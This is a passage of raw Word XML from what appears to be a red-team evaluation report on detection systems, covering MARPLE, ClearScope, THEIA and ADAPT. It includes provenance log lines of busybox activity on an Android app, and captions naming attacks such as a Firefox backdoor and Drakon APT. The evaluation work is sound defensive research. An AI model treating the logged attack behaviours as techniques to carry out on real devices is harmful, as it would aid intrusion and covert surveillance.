        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e52616297872322880707c966c7e2ee7|1557949923848000000|0.7500|1.0000|ta1-clearscope-2-e5-official-1|860178f80fe966cc8ee2f6bbd1a59dab||fileread:/data/data/de.belu.appstarter/busybox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDEF92F" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e7d3c83ceb66ec0ac6967ef506b0f0c3|1557950007942000000|0.7500|1.0000|ta1-clearscope-2-e5-official-1|860178f80fe966cc8ee2f6bbd1a59dab||exec:/data/data/de.belu.appstarter/busybox:/system/bin/screencap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A73D7" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6e6b18dc79de487456a806ebc917330f|1557950598372000000|0.7500|1.0000|ta1-clearscope-2-e5-official-1|860178f80fe966cc8ee2f6bbd1a59dab||filewrite:/data/data/de.belu.appstarter/busybox:/dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100ACB03" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091AE5A5" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E89D37" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>It launches toybox, did screencap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679CCAE2" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="000112FB" w:rsidRDefault="007508CA" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE57211" w14:textId="77777777" w:rsidR="005E53BB" w:rsidRDefault="00821808" w:rsidP="005E53BB">
      <w:pPr>
        <w:keepNext/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54FDA4CB" wp14:editId="7C448945">
            <wp:extent cx="5834743" cy="89256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27 at 10.29.43 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943659" cy="909228"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="121497C7" w14:textId="0AB29E28" w:rsidR="007508CA" w:rsidRPr="000112FB" w:rsidRDefault="005E53BB" w:rsidP="005E53BB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MARPLE-ClearScope attack using Barephone APK with Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72088120" w14:textId="77777777" w:rsidR="006F02EE" w:rsidRPr="006F02EE" w:rsidRDefault="006F02EE" w:rsidP="00821808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="313131"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AE5185" w14:textId="77777777" w:rsidR="005E53BB" w:rsidRDefault="00821808" w:rsidP="005E53BB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071A9EF0" wp14:editId="1B8DD244">
            <wp:extent cx="5850413" cy="214666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27 at 10.26.38 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5868681" cy="2153366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A88D0" w14:textId="4FCB18AF" w:rsidR="005A0BE6" w:rsidRDefault="005E53BB" w:rsidP="005E53BB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MARPLE-ClearSCope attack with Micro APT and Binary Format Elevate method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A511BE" w14:textId="77777777" w:rsidR="006F02EE" w:rsidRPr="000112FB" w:rsidRDefault="006F02EE" w:rsidP="006F02EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F47B72" w14:textId="77777777" w:rsidR="00A62E26" w:rsidRDefault="00821808" w:rsidP="00A62E26">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="389CC16F" wp14:editId="0266BDF6">
            <wp:extent cx="5882744" cy="253854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6-27 at 10.26.25 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5932966" cy="2560221"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4374F7B0" w14:textId="38BEE94F" w:rsidR="00821808" w:rsidRDefault="00A62E26" w:rsidP="00A62E26">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MARPLE-ClearScope attack with Java APT and Elevate driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0D3A9" w14:textId="77777777" w:rsidR="006F02EE" w:rsidRPr="000112FB" w:rsidRDefault="006F02EE" w:rsidP="00821808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441DCE02" w14:textId="77777777" w:rsidR="00A62E26" w:rsidRDefault="00821808" w:rsidP="00A62E26">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4213F57E" wp14:editId="61D816C5">
            <wp:extent cx="5865223" cy="143575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6-27 at 10.26.10 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5928232" cy="1451182"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17523B" w14:textId="6F51D0F0" w:rsidR="006F02EE" w:rsidRDefault="00A62E26" w:rsidP="00A62E26">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MARPLE-ClearScope attack with Firefox backdoor and Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF9A5A" w14:textId="77777777" w:rsidR="00141067" w:rsidRDefault="00141067" w:rsidP="006F02EE"/>
    <w:p w14:paraId="583C6FBD" w14:textId="5254B510" w:rsidR="00141067" w:rsidRPr="000112FB" w:rsidRDefault="00D31398" w:rsidP="000E52B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="_Toc12600165"/>
      <w:r>
        <w:t xml:space="preserve">TA1 </w:t>
      </w:r>
      <w:r w:rsidR="00141067" w:rsidRPr="000112FB">
        <w:t>THEIA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="284"/>
    </w:p>
    <w:p w14:paraId="21979156" w14:textId="77777777" w:rsidR="00141067" w:rsidRDefault="00141067" w:rsidP="00141067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">None of the attacks against THEIA were detected.  In each case they mistook benign actions as malicious.  We do not count the actual setup of the attack as malicious, however we do not see that as a negative.  The actions that take place as they relate to the driver are what we are looking for.  None of these actions were reported.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA64E6" w14:textId="77777777" w:rsidR="00AF5C17" w:rsidRPr="000112FB" w:rsidRDefault="00AF5C17" w:rsidP="00141067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC7A61C" w14:textId="5AD82004" w:rsidR="00141067" w:rsidRDefault="00141067" w:rsidP="00141067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">MARPLE keyed in on the download of the kernel module and elevate but did not see any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>activity associated with either</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202DA5D8" w14:textId="77777777" w:rsidR="00AF5C17" w:rsidRDefault="00AF5C17" w:rsidP="00141067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12402497" w14:textId="6F1FD0F2" w:rsidR="00AF5C17" w:rsidRDefault="00AF5C17" w:rsidP="00141067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Performance was an issue as the hosts crashed or were unresponsive at times throughout the engagement.  To THEIA’s credit, though, they were able to resolve the issues during the engagement, and we were able to run a complete attack against one of their hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5EB67" w14:textId="77777777" w:rsidR="007508CA" w:rsidRDefault="007508CA" w:rsidP="00141067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB556C1" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="000112FB" w:rsidRDefault="007508CA" w:rsidP="000E52B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="_Toc12600166"/>
      <w:r>
        <w:t xml:space="preserve">TA1 </w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:t>MARPLE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p w14:paraId="7B9A4399" w14:textId="495BC07B" w:rsidR="00AF5C17" w:rsidRDefault="00AF5C17" w:rsidP="007508CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>No successfully reported attacks on TA1 MARPLE.  We only ran 2 attacks against their host, and unfortunately one of those was against an uninstrumented host which had been taken out of the engagement.  There were problems with the benign activity and the TA1 MARPLE host where the benign activity would either close the open running instrumentation process or cause the host to reboot.  Because of this, BBN pared down the number of TA1 MARPLE hosts from 3 to 1.  Unfortunately, we attacked the wrong host such that no data was generated for TA2s to analyze.  The other attack on 5/9 went unreported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF40646" w14:textId="77777777" w:rsidR="00AF5C17" w:rsidRDefault="00AF5C17" w:rsidP="007508CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3357A732" w14:textId="3364696A" w:rsidR="007508CA" w:rsidRPr="000112FB" w:rsidRDefault="007508CA" w:rsidP="00AF5C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>On 5/13</w:t>
      </w:r>
      <w:r w:rsidR="00AF5C17">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, unexpectedly</w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> reported Mimikatz beh</w:t>
      </w:r>
      <w:r w:rsidR="00AF5C17">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>avior.  This is unusual because mimikatz itself was not used at all during the engagement.  We did use a mimikatz module on Windows 10, but not against TA1 MARPLE.  The data almost seemed like it was remaining from Engagement 4.  We asked BBN if there could have been an issue with stale data, and they did not think so.  We’re not sure what this was or why it was reported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78200038" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="00141067" w:rsidRDefault="007508CA" w:rsidP="00141067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69986687" w14:textId="16A23D56" w:rsidR="006F02EE" w:rsidRPr="000112FB" w:rsidRDefault="006F02EE" w:rsidP="000E52B4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="_Toc12600167"/>
      <w:r>
        <w:t>ADAPT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>
    </w:p>
    <w:p w14:paraId="3AE9B1F5" w14:textId="1F2FC639" w:rsidR="009B5E2C" w:rsidRDefault="001C08FA" w:rsidP="00365694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>After reading the report provided by ADAPT we were unable to separate the signal from the noise.  What the report contained was page after page of raw data with no analysis and no graphs identifying malicious activity.  Based on the data provid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ed, we could not evaluate them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D43268" w14:textId="159E6E04" w:rsidR="009B5E2C" w:rsidRDefault="009B5E2C" w:rsidP="00365694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EF45B3" w14:textId="77777777" w:rsidR="009B5E2C" w:rsidRDefault="009B5E2C" w:rsidP="00365694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C78BE84" w14:textId="77777777" w:rsidR="009B5E2C" w:rsidRDefault="009B5E2C" w:rsidP="00365694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12253470" w14:textId="325CC831" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00365694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
